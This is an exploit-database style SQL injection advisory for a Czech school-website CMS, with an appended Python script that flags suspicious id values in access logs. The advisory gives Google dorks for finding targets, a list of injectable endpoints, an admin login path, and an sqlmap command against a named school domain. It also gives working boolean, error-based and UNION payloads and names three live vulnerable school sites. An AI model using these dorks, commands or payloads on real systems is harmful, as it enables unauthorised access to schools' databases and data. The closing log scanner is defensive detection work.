`############################################################
# Exploit Title : Vitalex Computers SRO Tvorba školních webu 1.0 SQL Injection
# Exploit Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages : vitalex.cz
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba školních webu'' site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
+ TinyMCE 4.0 - FancyBox2.1.5 - jQuery1.12.2 - jQuery UI1.11.4 -
+ CodeMirror 5.20.2
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236
############################################################
Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webu SQL Injection Vulnerability
############################################################
# Admin Panel Login Path : /administrator/
Other Possible Dorks =>
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
############################################################
# SQL Injection Exploit =>
/public/printCalendar.php?id=[SQL Injection]
/public/printFood.php?id=[SQL Injection]
/public/script.php?id=[SQL Injection]
/public/setTemplate.php?id=[SQL Injection]
/public/statniSvatky.php?id=[SQL Injection]
/index.php?type=Blog&id=[SQL Injection]
/index.php?type=Contact&id=[SQL Injection]
/index.php?type=Post&id=[SQL Injection]
############################################################
[+] SQLMAP Poc :
$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=164 AND 1041=1041
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=164 AND (SELECT 5925 FROM (SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=164 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a46637249687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zEWq
########################################################################################
# Example Vulnerable Sites =>
# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#######################################################################################
`
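
A defender-side triage check for the endpoints listed in this advisory, added here as an example (not part of the original advisory or of the vendor's code): it scans web-server access logs for requests whose `id` parameter is not a plain integer. The log lines are constructed, the client addresses come from the documentation range 192.0.2.0/24, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints the advisory lists as taking an injectable `id` parameter.
ADVISORY_PATHS = {
    "/public/printAction.php", "/public/printCalendar.php",
    "/public/printFood.php", "/public/script.php",
    "/public/setTemplate.php", "/public/statniSvatky.php",
    "/index.php",  # advisory names type=Blog, Contact and Post
}
# Request field of a common/combined format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]{1,10}")

def suspicious_id(target):
    """Return the URL-decoded id if it is not a plain integer, else None."""
    parts = urlsplit(target)
    if parts.path not in ADVISORY_PATHS:
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not INTEGER_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return [(line_number, decoded_id)] for requests that need triage."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        value = suspicious_id(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log; the non-integer values reuse strings from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2018:10:00:01 +0100] "GET /public/printAction.php?id=164 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/Dec/2018:10:00:07 +0100] "GET /public/printAction.php?id=235%27 HTTP/1.1" 200 310',
    '192.0.2.44 - - [30/Dec/2018:10:00:09 +0100] "GET /public/printAction.php?id=164%20AND%201041=1041 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/Dec/2018:10:00:12 +0100] "GET /index.php?type=Blog&id=12 HTTP/1.1" 200 8800',
    '192.0.2.44 - - [30/Dec/2018:10:00:15 +0100] "GET /index.php?type=Post&id=7+UNION+ALL+SELECT+NULL HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer id {value!r}")
```

A hit shows that a non-numeric `id` reached the application, not that injection succeeded. The fix remains in the application itself: cast `id` to an integer or bind it as a query parameter.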